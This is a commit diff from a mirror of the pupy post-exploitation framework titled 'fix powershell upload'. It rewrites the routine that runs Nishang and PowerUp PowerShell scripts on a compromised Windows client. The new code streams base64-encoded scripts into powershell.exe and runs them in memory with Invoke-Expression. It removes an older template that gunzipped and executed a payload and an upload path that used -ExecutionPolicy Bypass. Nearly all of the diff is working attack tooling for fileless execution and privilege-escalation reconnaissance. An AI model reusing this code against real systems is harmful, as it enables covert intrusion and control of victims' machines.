mirror of https://github.com/n1nj4sec/pupy.git
fix powershell upload
This commit is contained in:
parent
cb07309a90
commit
f3af4aa726
|
@ -17,4 +17,4 @@ class CheckVM(PupyModule):
|
|||
content = open(os.path.join(ROOT, "external", "Nishang", "Check-VM.ps1"), 'r').read()
|
||||
function = 'Check-VM'
|
||||
output = execute_powershell_script(self, content, function)
|
||||
self.success("Output of the script: \n%s" % output)
|
||||
self.success("%s" % output)
|
|
@ -1,10 +0,0 @@
|
|||
$base64 = "[BASE64]"
|
||||
$data = [System.Convert]::FromBase64String($base64)
|
||||
$ms = New-Object System.IO.MemoryStream
|
||||
$ms.Write($data, 0, $data.Length)
|
||||
$ms.Seek(0,0) | Out-Null
|
||||
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress)
|
||||
$sr = New-Object System.IO.StreamReader($cs)
|
||||
$t = $sr.readtoend()
|
||||
Invoke-Expression $t
|
||||
Invoke-Expression [FUNCTION_NAME]
|
|
@ -1,54 +1,29 @@
|
|||
from rpyc.utils.classic import upload
|
||||
import base64
|
||||
import tempfile
|
||||
import gzip
|
||||
import StringIO
|
||||
from subprocess import PIPE, Popen
|
||||
import subprocess
|
||||
import os
|
||||
|
||||
ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),"..", "..", ".."))
|
||||
|
||||
def execute_powershell_script(module, content, function):
|
||||
template = open(os.path.join(ROOT, "modules", "lib", "utils", "upload_powershell_script_template.ps1"), 'r').read()
|
||||
fullargs=["powershell.exe", "-C", "-"]
|
||||
|
||||
# compress the content of the script to upload
|
||||
out = StringIO.StringIO()
|
||||
with gzip.GzipFile(fileobj=out, mode="w") as f:
|
||||
f.write(content)
|
||||
p = module.client.conn.modules.subprocess.Popen(fullargs, stdout=PIPE, stderr=PIPE, stdin=PIPE, bufsize=0, universal_newlines=True, shell=True)
|
||||
p.stdin.write("$base64=\"\""+"\n")
|
||||
n = 20000
|
||||
line = base64.b64encode(content)
|
||||
tab = [line[i:i+n] for i in range(0, len(line), n)]
|
||||
for t in tab:
|
||||
p.stdin.write("$base64+=\"%s\"\n" % t)
|
||||
p.stdin.flush()
|
||||
|
||||
# encode the gzip content in base64
|
||||
encoded = base64.b64encode(out.getvalue())
|
||||
|
||||
# replace meta data from the template
|
||||
template = template.replace('[BASE64]', encoded)
|
||||
template = template.replace('[FUNCTION_NAME]', function)
|
||||
p.stdin.write("$d=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64))\n")
|
||||
p.stdin.write("Invoke-Expression $d\n")
|
||||
p.stdin.write("$a=Invoke-Expression %s | Format-Table -HideTableHeaders | Out-String\n" % function)
|
||||
p.stdin.write("$b=[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes(\"$a\"))\n")
|
||||
p.stdin.write("Write-Host $b\n")
|
||||
|
||||
# Get the result
|
||||
output = ""
|
||||
# execute of the powershell script in memory if the size is lower of the max size
|
||||
if len(template) < 32710:
|
||||
module.success("Executing the powershell code on memory")
|
||||
cmd = []
|
||||
cmd.append('powershell.exe')
|
||||
cmd.append('/c')
|
||||
cmd.append(template)
|
||||
output = module.client.conn.modules.subprocess.check_output(cmd, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, universal_newlines=True)
|
||||
else:
|
||||
tf = tempfile.NamedTemporaryFile()
|
||||
f = open(tf.name, 'w')
|
||||
f.write(template)
|
||||
f.close()
|
||||
|
||||
remoteTempFolder = module.client.conn.modules['os.path'].expandvars("%TEMP%")
|
||||
tfName = tf.name.split(os.sep)
|
||||
tfName = tfName[len(tfName)-1]
|
||||
|
||||
module.success("Uploading powershell code to: %s\%s.ps1" % (remoteTempFolder, tfName))
|
||||
upload(module.client.conn, tf.name, module.client.conn.modules['os.path'].join(remoteTempFolder, '%s.ps1' % tfName))
|
||||
|
||||
module.success("Executing the powershell code")
|
||||
output = module.client.conn.modules.subprocess.check_output("PowerShell.exe -ExecutionPolicy Bypass -File %s.ps1"%(module.client.conn.modules['os.path'].join(remoteTempFolder, tfName)), stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True)
|
||||
|
||||
module.success("Removing the powershell code")
|
||||
module.client.conn.modules.subprocess.check_output("cmd.exe del %s.ps1" % (module.client.conn.modules['os.path'].join(remoteTempFolder, tfName)), stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True)
|
||||
|
||||
for i in p.stdout.readline():
|
||||
output += i
|
||||
output = base64.b64decode(output)
|
||||
return output
|
|
@ -23,4 +23,4 @@ class PowerUp(PupyModule):
|
|||
|
||||
# parse output depending on the PowerUp output
|
||||
output = output.replace('\r\n\r\n\r\n', '\r\n\r\n').replace("\n\n", "\n").replace("\n\n", "\n")
|
||||
self.success("Output of the script: \n%s" % output)
|
||||
self.success("%s" % output)
|
Loading…
Reference in New Issue